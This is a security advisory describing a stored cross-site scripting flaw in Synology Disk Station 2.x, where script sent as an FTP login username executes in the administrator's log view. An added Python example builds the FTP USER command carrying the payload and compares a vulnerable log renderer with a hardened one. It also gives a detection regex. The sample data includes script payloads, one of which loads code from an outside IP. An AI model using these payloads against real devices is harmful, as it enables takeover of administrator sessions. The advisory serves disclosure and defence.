Credit:
The information has been provided by Rodrigo Rubira Branco.
The original article can be found at: http://seclists.org/fulldisclosure/2010/Sep/369
Vulnerable Systems:
* Synology Disk Station version 2.x
Exploitation takes four steps, each tied to the underlying flaw:
1. The attacker supplies a malicious string as the username at the FTP login prompt. Because the credentials are invalid, the FTP authentication module records the failure, and the attacker-controlled username is written to the log that the Disk Station's web interface displays.
2. The FTP logging module does not sanitize what it records: the string taken from the FTP login is placed into the log view of the web interface as-is, without verifying its content type or HTML-encoding it, so the browser renders it as HTML or script. An attacker can therefore inject HTML tags, DOM calls, third-party scripts and CSRF requests that execute in the browser session of the logged-in account administering the device.
3. The log view is normally used by the admin account, so injected code runs with full administrator privileges. Because the payload lives in the stored log, the injection is persistent in most cases: it remains and executes each time the log is viewed. CSRF requests carried by the payload execute without any further user interaction.
4. The attacker needs to know the directory structure of the Disk Station Manager so that the injected requests target the right paths and follow-on operations can be performed. The FTP server accepts usernames of roughly 80 to 100 characters, which is enough room to craft a working injection; the scripts can be loaded from the local domain, the LAN or a third-party source to run arbitrary code.
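The chain above, as an added example that is not part of the advisory and not Synology's code: the DSM log page is not on the page, so a small stand-in renderer plays its role. The block shows the FTP USER command that carries the payload (length-checked against the 80-character lower bound the advisory quotes; the limit is an assumption), the vulnerable rendering that concatenates the stored username into HTML beside the hardened rendering that escapes it, and a detection rule that flags markup-looking usernames in failed FTP logins. The log entries, IPs and payloads are constructed sample data; no FTP connection is made.

```python
import html
import re

# Assumption from the advisory: the FTP server accepts usernames of about 80-100
# characters. The lower bound is used here as the budget for a payload.
MAX_FTP_USERNAME = 80

# Constructed sample of failed-login entries as a log might store them. The
# "user" field is attacker-controlled: it is whatever was sent after USER.
SAMPLE_LOG = [
    {"time": "2010-09-26 10:01:02", "ip": "192.0.2.10",
     "user": "admin", "result": "login failed"},
    {"time": "2010-09-26 10:01:09", "ip": "192.0.2.10",
     "user": '<script src="http://203.0.113.5/x.js"></script>', "result": "login failed"},
    {"time": "2010-09-26 10:01:15", "ip": "192.0.2.10",
     "user": '<img src=x onerror="alert(1)">', "result": "login failed"},
]


def fits_ftp_username(payload: str) -> bool:
    """True if the payload fits in the assumed username length budget."""
    return len(payload) <= MAX_FTP_USERNAME


def ftp_user_command(payload: str) -> bytes:
    """Build the raw FTP USER command that delivers the payload. A wrong
    password follows in a real attempt; the failure is what gets logged."""
    if not fits_ftp_username(payload):
        raise ValueError("payload exceeds the FTP username length budget")
    return f"USER {payload}\r\n".encode()


def render_log_vulnerable(entries) -> str:
    """Stand-in for the flawed log page: raw log fields are concatenated into
    HTML, so a username containing markup becomes live markup in the admin's
    browser. This mirrors the advisory's description, not DSM's actual code."""
    rows = "".join(
        f"<tr><td>{e['time']}</td><td>{e['ip']}</td>"
        f"<td>{e['user']}</td><td>{e['result']}</td></tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


def render_log_safe(entries) -> str:
    """Hardened version: every untrusted field goes through html.escape() with
    quote=True, so '<', '>', '&', '\"' and \"'\" become entities and can no
    longer open a tag or break out of an attribute."""
    rows = "".join(
        "<tr>"
        + "".join(f"<td>{html.escape(str(e[k]), quote=True)}</td>"
                  for k in ("time", "ip", "user", "result"))
        + "</tr>"
        for e in entries
    )
    return f"<table>{rows}</table>"


# Heuristic for usernames that look like HTML or script rather than a login
# name: an opening/closing tag, a javascript: URL, or an on*= event handler.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def find_injection_attempts(entries):
    """Return the failed-login entries whose username matches the heuristic.
    Run over the FTP log, this flags attempts against an unpatched device."""
    return [e for e in entries if SUSPICIOUS.search(e["user"])]


if __name__ == "__main__":
    print(ftp_user_command(SAMPLE_LOG[1]["user"]))
    print("vulnerable:", render_log_vulnerable(SAMPLE_LOG))
    print("hardened:  ", render_log_safe(SAMPLE_LOG))
    for e in find_injection_attempts(SAMPLE_LOG):
        print("suspicious login from", e["ip"], "user=", e["user"])
```

Escaping at output time is the fix that removes the bug regardless of what the FTP daemon logs; the detection rule is the compensating control for devices still on 2.x, since the entries it flags are exactly the ones that would execute in an administrator's browser.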
Patch Availability:
Synology issued an update for this vulnerability in the release DSM3.0-1337.
CVE Information:
CVE-2010-2453
Disclosure Timeline:
26 Sep 2010 - Advisory published